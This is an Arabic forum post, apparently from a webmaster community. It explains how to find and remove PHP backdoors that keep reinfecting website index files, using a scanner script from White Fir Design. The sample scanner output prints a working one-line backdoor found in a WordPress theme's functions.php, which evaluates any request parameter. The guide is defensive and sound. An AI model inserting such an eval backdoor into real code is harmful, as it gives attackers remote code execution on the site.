انا الي فتره ما شاركت هنا بعد موضوعي
شرح المفصل لعملية تغير اسم الدومين وتحويل الارشفه الي الدومين الجديد مع مثال حي
اليوم عندي موضوع مهم جدا جدا وعشان هيك حبيت اشاركه معكم
مشكلة الفيروسات في الموقع و قد يضر هذه الموقع بجهازكم
وانا هنا بتكلم عن الفايروسات الي بتزرع اكواد في index هيه عباره عن فيروسات مشفره
طبعا اسرع حل لهذه المشكله هو انك تحذف كل WWW وتركب نسخه اجديده من لسكريبتات وتربطها بقاعدة البيانات
لكن فيه ناس تانيه بتروح علي ملفات الاندكس وبتحذف منها الكود وبتنحل المشكله بدون ما يحذف كل المجلدات
لكن المصيبه انوا بعد 5 دقائق او يوم حتي بتلاقي الاكواد رجعت تاني !!! هاده لانوا بعض الفيروسات الجديده بكون الها اشي اسمه باب خلفي باك دور بيقدر منوا الفايروس انوا يرجع يكتب نفسوا في ملفاتك او حتي يعمل تحديث لنفسوا !!! :nosweat: تخيل انت مش خالص من الفايروس اروح ينزلك كل شويه نسخه احدث منوا :nosweat:
المهم الان للحل وهو اسكريبت بيعمل سكان للمساحه تبعتك بالكامل وبيعطيك موقع الباك دور عندك وبمجرد انك تحذفوا وتروح تحذف اكواد الاندكس فالفايروس مش حيرجع تاني
طبعا لسكريبت انا مستخدموا علي عشرات المواقع قبل كده ودايمن بيعطيني نتيجه حلوه
الشرح
1- حمل لسكريبت من المرفقات او من الرابط المباشر هناااااااا او من هنااااااااااااااا
2-فك الضغط وارفع ملف php علي www وافتحوا عن طريق المتصفح
اذا اعطاك النتيجه التاليه
رمز Code:
Basic Backdoor Script Finder by White Fir Design
Done
فهذه يعني انوا ما فيه باك دور في موقعك اتعرف عليهم لسكريبت فهناك احتمالين
1- ما في باك دور والفيروسات فقط في الاندكس احذفهم وانتهي الموضوع
2- موجود باك دور بس ما تعرف عليه اللسكريبت
اما اذا اعطاك نتيجه مثل
رمز Code:
Basic Backdoor Script Finder by White Fir Design
File: /home/hakijhhla/public_html/blog/wp-content/themes/twentyeleven/functions.php
String:: if (isset($_REQUEST[asc])) eval(stripslashes($_REQUEST[asc]));
Done
هاده بيعني انوا تم العثور علي باك دور في موقعك و مكان الباك دور هو
رمز Code:
File: /home/hakijhhla/public_html/blog/wp-content/themes/twentyeleven/functions.php
والباك دور هو الكود
رمز Code:
if (isset($_REQUEST[asc])) eval(stripslashes($_REQUEST[asc]));
الان كل ما عليك هو انك تروح علي ملف functions.php حتلاقي الكود في اول الصفحه علي الاكثر احذفوا و اعمل اسكان كمان مره بالسكريبت و المفروض يعطيك انوا انحلت المشكله
طبعا هذه الشرح للفيروسات الي بتكون بدايتها ب Base64 Decoder وما بيشملها كلها لكن لسكريبت اداه من الادوات الي ممكن تستخدمها
حقوقك لسكريبت لموقع White Fir Design - Web Design, Security, and Marketing والموقع جميل و ويوجد به محتوي مفيد
سامحونا علي ايه اخطاء في الموضوع وبنسبه لناس الي عندها مشكله في موقعها و عايزين انظف الموقع بنيابه عنهم بامكانك فتح تذكره او ارسل رساله الي بريدي lr2b.comgmail.com لاني مش مرابط هنا في المنتدي
بعد التخلص من الباك دور يوجود الاكثير من الاشياء لتحسين حماية موقعك والاتاكد من عدم وجود ايه فيروسات متبقيه وقد شرح الاخوه هذه الكلام في مواضيع كثيره ارجوا الرجوع لها وعدم الاكتفاء بهذه لسكريبت
هذه الشرح لمن لديهم خلفيه بسيطه جدا عن php وليس للمبتدئين وانصح من يواجه نفس المشكله وليس لديه خبره بطلب المساعده من الاخرين
هذه الشرح لمن لديهم خلفيه بسيطه جدا عن php وليس للمبتدئين وانصح من يواجه نفس المشكله وليس لديه خبره بطلب المساعده من الاخرين
الملفات المرفقة basicbackdoorscriptfinder.zip (2.3 كيلوبايت)